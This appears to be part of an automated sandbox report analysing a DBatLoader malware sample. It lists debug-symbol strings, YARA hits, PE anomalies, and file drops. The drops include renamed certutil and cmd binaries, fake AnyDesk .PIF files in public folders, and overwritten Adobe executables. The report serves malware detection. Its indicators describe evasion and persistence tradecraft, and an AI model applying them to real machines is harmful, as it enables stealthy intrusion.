                      Source: Binary string: cmd.pdb source: alpha.exe, 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000009.00000000.1280279137.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000000.1285426299.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000002.1306669852.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000000.1298979747.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000000.1307623271.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000002.1308916113.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000002.1311273643.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000000.1309412413.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, esentutl.exe, 00000015.00000003.1414346732.0000000005580000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000F.00000002.1459416504.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1418076900.0000000021AEF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311674784.0000000002BB7000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1418076900.0000000021AC0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1457046440.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B24000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1444995649.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B60000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000016.00000003.1418764393.00000000056A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb source: alg.exe, 0000001D.00000003.2568619306.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000001D.00000003.2264299191.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 0000001D.00000003.1936659520.0000000001550000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1519766371.0000000005E50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\dbs\el\omr\target\x64\ship\click2run\x-none\IntegratedOffice.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: alg.exe, 0000001D.00000003.2667411347.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000001D.00000003.2195638183.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdb source: alg.exe, 0000001D.00000003.1954090127.0000000001660000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000002.1459416504.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B24000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1444995649.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Acrobat_SL.pdb source: alg.exe, 0000001D.00000003.1936659520.0000000001550000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000009.00000000.1280279137.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000000.1285426299.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000002.1306669852.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000000.1298979747.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000000.1307623271.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000002.1308916113.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000002.1311273643.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000000.1309412413.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, esentutl.exe, 00000015.00000003.1414346732.0000000005580000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000001D.00000003.2580817829.0000000000620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2598730489.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2579062872.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb} source: alg.exe, 0000001D.00000003.2568619306.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000016.00000003.1418764393.00000000056A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: certutil.pdb source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000001D.00000003.2083482558.0000000000410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mavinject32.pdb source: alg.exe, 0000001D.00000003.2690766843.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: maintenanceservice.pdb source: alg.exe, 0000001D.00000003.1831857242.00000000016A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000001D.00000003.2650684922.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: certutil.pdbGCTL source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000001D.00000003.2392507411.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000001D.00000003.2264299191.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000001D.00000003.2479887474.0000000000650000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb@@ source: alg.exe, 0000001D.00000003.2424853674.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\dbs\el\omr\target\x64\ship\click2run\x-none\IntegratedOffice.pdb source: alg.exe, 0000001D.00000003.2667411347.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: maintenanceservice.pdb` source: alg.exe, 0000001D.00000003.1831857242.00000000016A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000001D.00000003.2517364614.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdb source: alg.exe, 0000001D.00000003.2297694474.0000000000450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ALG.pdb source: Native_neworigin.exe, 0000001B.00000003.1444838110.0000000005B00000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 0000001B.00000003.1519766371.0000000005E50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1444838110.0000000005B00000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdbTTT source: alg.exe, 0000001D.00000003.1954090127.0000000001660000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: FXSSVC.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1644259863.0000000005330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: AppVShNotify.pdb source: alg.exe, 0000001D.00000003.2627543341.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb source: alg.exe, 0000001D.00000003.2424853674.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdbQ source: alg.exe, 0000001D.00000003.2297694474.0000000000450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000001D.00000003.2627543341.0000000000620000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Yara detected DBatLoader
                      Source: Yara matchFile source: 15.2.AnyDesk.PIF.2df0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 27.2.Native_neworigin.exe.52d0f08.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 27.2.Native_neworigin.exe.405c190.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 27.2.Native_neworigin.exe.2b6711e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: alpha.exe.8.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0894C LoadLibraryW,GetProcAddress,FreeLibrary,15_2_02E0894C
                      Source: AnyDesk.PIF.14.drStatic PE information: real checksum: 0x0 should be: 0x12fdf5
                      Source: FXSSVC.exe.27.drStatic PE information: real checksum: 0xa20cd should be: 0x13585e
                      Source: Trading_AIBot.exe.25.drStatic PE information: real checksum: 0x0 should be: 0x16b30
                      Source: aymtmquJ.pif.15.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                      Source: Juqmtmya.PIF.23.drStatic PE information: real checksum: 0x0 should be: 0x12fdf5
                      Source: armsvc.exe.25.drStatic PE information: real checksum: 0x32318 should be: 0x148a40
                      Source: alpha.exe.8.drStatic PE information: section name: .didat
                      Source: kn.exe.10.drStatic PE information: section name: .didat
                      Source: alpha.pif.21.drStatic PE information: section name: .didat
                      Source: armsvc.exe.25.drStatic PE information: section name: .didat
                      Source: alg.exe.27.drStatic PE information: section name: .didat
                      Source: FXSSVC.exe.27.drStatic PE information: section name: .didat
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A73668 push rsp; ret 12_2_00007FF627A73669
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E1D2FC push 02E1D367h; ret 15_2_02E1D35F
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DF63B0 push 02DF640Bh; ret 15_2_02DF6403
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DF63AE push 02DF640Bh; ret 15_2_02DF6403
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DFC349 push 8B02DFC1h; ret 15_2_02DFC34E
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E1C378 push 02E1C56Eh; ret 15_2_02E1C566
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DF332C push eax; ret 15_2_02DF3368
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E1D0AC push 02E1D125h; ret 15_2_02E1D11D
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0306B push 02E030B9h; ret 15_2_02E030B1
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0306C push 02E030B9h; ret 15_2_02E030B1
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E1D1F8 push 02E1D288h; ret 15_2_02E1D280
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E1D144 push 02E1D1ECh; ret 15_2_02E1D1E4
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0F108 push ecx; mov dword ptr [esp], edx15_2_02E0F10D
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DF6784 push 02DF67C6h; ret 15_2_02DF67BE
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DF6782 push 02DF67C6h; ret 15_2_02DF67BE
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DFD5A0 push 02DFD5CCh; ret 15_2_02DFD5C4
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E1C570 push 02E1C56Eh; ret 15_2_02E1C566
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DFC56C push ecx; mov dword ptr [esp], edx15_2_02DFC571
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0AAE0 push 02E0AB18h; ret 15_2_02E0AB10
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E08AD8 push 02E08B10h; ret 15_2_02E08B08
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0AADF push 02E0AB18h; ret 15_2_02E0AB10
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DFCBEC push 02DFCD72h; ret 15_2_02DFCD6A
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0886C push 02E088AEh; ret 15_2_02E088A6
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E64850 push eax; ret 15_2_02E64920
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DFC9DE push 02DFCD72h; ret 15_2_02DFCD6A
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E06946 push 02E069F3h; ret 15_2_02E069EB
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E06948 push 02E069F3h; ret 15_2_02E069EB
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0790C push 02E07989h; ret 15_2_02E07981
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E05E7C push ecx; mov dword ptr [esp], edx15_2_02E05E7E
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E02F60 push 02E02FD6h; ret 15_2_02E02FCE
                      Source: AppVClient.exe.27.drStatic PE information: section name: .reloc entropy: 7.936513564869937
                      Source: FXSSVC.exe.27.drStatic PE information: section name: .reloc entropy: 7.9422644511435525
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 27.2.Native_neworigin.exe.52d0f08.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 27.2.Native_neworigin.exe.405c190.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 27.2.Native_neworigin.exe.2b6711e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                      Persistence and Installation Behavior

                      barindex
                      Creates files in the system32 config directory
                      Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\8c4bfd40d4df6ab2.bin
                      Drops PE files with a suspicious file extension
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFFile created: C:\Users\Public\Libraries\aymtmquJ.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Juqmtmya.PIFJump to dropped file
                      Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
                      Drops executable to a common third party application directory
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
